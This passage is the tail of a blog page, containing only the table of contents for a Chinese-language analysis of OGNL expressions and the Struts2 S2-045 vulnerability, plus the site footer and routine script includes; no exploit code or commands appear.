              <div class="post-toc-content"><ol class="nav"><li class="nav-item nav-level-3"><a class="nav-link" href="#0x00-OGNL表达式"><span class="nav-text">0x00 OGNL表达式</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#1-ognl基本介绍"><span class="nav-text">1) ognl基本介绍</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#2-ognl基本用法示例"><span class="nav-text">2)ognl基本用法示例</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#3-ognl执行系统命令"><span class="nav-text">3) ognl执行系统命令</span></a></li></ol></li><li class="nav-item nav-level-3"><a class="nav-link" href="#0x01-S2-045漏洞简述"><span class="nav-text">0x01 S2-045漏洞简述</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#0x02-S2-045漏洞分析"><span class="nav-text">0x02 S2-045漏洞分析</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#1-漏洞补丁对比"><span class="nav-text">1) 漏洞补丁对比</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#2-Jakarta解析multipart上传请求"><span class="nav-text">2)Jakarta解析multipart上传请求</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#3-加断点动态测试"><span class="nav-text">3) 加断点动态测试</span></a><ol class="nav-child"><li class="nav-item nav-level-5"><a class="nav-link" href="#JakartaMultiPartRequest-java-buildErrorMessage"><span class="nav-text">JakartaMultiPartRequest.java - buildErrorMessage()</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#LocalizedTextUtil-java"><span class="nav-text">LocalizedTextUtil.java</span></a><ol class="nav-child"><li class="nav-item nav-level-6"><a class="nav-link" href="#findText"><span class="nav-text">findText()</span></a></li><li class="nav-item nav-level-6"><a class="nav-link" href="#getDefaultMessage"><span class="nav-text">getDefaultMessage()</span></a></li></ol></li><li class="nav-item nav-level-5"><a class="nav-link" href="#TextParseUtil-java-translateVariables"><span class="nav-text">TextParseUtil.java - translateVariables()</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#evaluate-方法说明"><span class="nav-text">evaluate()方法说明</span></a></li></ol></li></ol></li><li class="nav-item nav-level-3"><a class="nav-link" href="#参考"><span class="nav-text">参考:</span></a></li></ol></div>
            

          </div>
        </section>
      <!--/noindex-->
      

      

    </div>
  </aside>


        
      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        <div class="copyright">&copy; <span itemprop="copyrightYear">2019</span>
  <span class="with-love">
    <i class="fa fa-user"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">pplsec</span>

  
</div>









        







        
      </div>
    </footer>

    
      <div class="back-to-top">
        <i class="fa fa-arrow-up"></i>
        
      </div>
    

    

  </div>

  

<script type="text/javascript">
  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
    window.Promise = null;
  }
</script>









  












  
  
    <script type="text/javascript" src="/lib/jquery/index.js?v=2.1.3"></script>
  

  
  
    <script type="text/javascript" src="/lib/fastclick/lib/fastclick.min.js?v=1.0.6"></script>
  

  
  
    <script type="text/javascript" src="/lib/jquery_lazyload/jquery.lazyload.js?v=1.9.7"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.ui.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/fancybox/source/jquery.fancybox.pack.js?v=2.1.5"></script>
  


  


  <script type="text/javascript" src="/js/src/utils.js?v=5.1.4"></script>

  <script type="text/javascript" src="/js/src/motion.js?v=5.1.4"></script>



  
  


  <script type="text/javascript" src="/js/src/affix.js?v=5.1.4"></script>

  <script type="text/javascript" src="/js/src/schemes/pisces.js?v=5.1.4"></script>



  
  <script type="text/javascript" src="/js/src/scrollspy.js?v=5.1.4"></script>
<script type="text/javascript" src="/js/src/post-details.js?v=5.1.4"></script>



  


  <script type="text/javascript" src="/js/src/bootstrap.js?v=5.1.4"></script>



  


  




	





  





  












  





  

  

  

  
  

  

  

  

</body>
</html>
